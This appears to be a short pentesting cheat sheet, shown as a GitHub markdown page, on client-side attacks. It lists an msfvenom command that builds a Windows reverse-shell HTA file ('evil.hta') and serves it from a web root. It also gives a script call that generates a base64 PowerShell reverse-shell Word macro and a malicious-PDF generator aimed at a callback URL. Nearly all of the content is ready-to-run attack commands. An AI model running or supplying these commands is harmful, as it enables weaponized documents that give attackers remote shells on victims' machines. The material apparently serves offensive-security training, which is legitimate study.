Skip to content

Latest commit

 

History

History
27 lines (22 loc) · 772 Bytes

client_side_attacks.md

File metadata and controls

27 lines (22 loc) · 772 Bytes

Client-Side Attacks

HTA Attack in Action

-> Get web browser name, operating system, device type

-> Creating a malicious .hta with msfvenom

sudo msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f hta-psh -o /var/www/html/evil.hta

Microsoft Word Macro Attack

-> Generate a malicious macro for reverse shell in powershell using base64 for .doc

python evil_macro.py -l <ip> -p <port> -o macro.txt

Malicious PDF

-> Malicious PDF Generator

python3 malicious-pdf.py burp-collaborator-url

-> evilpdf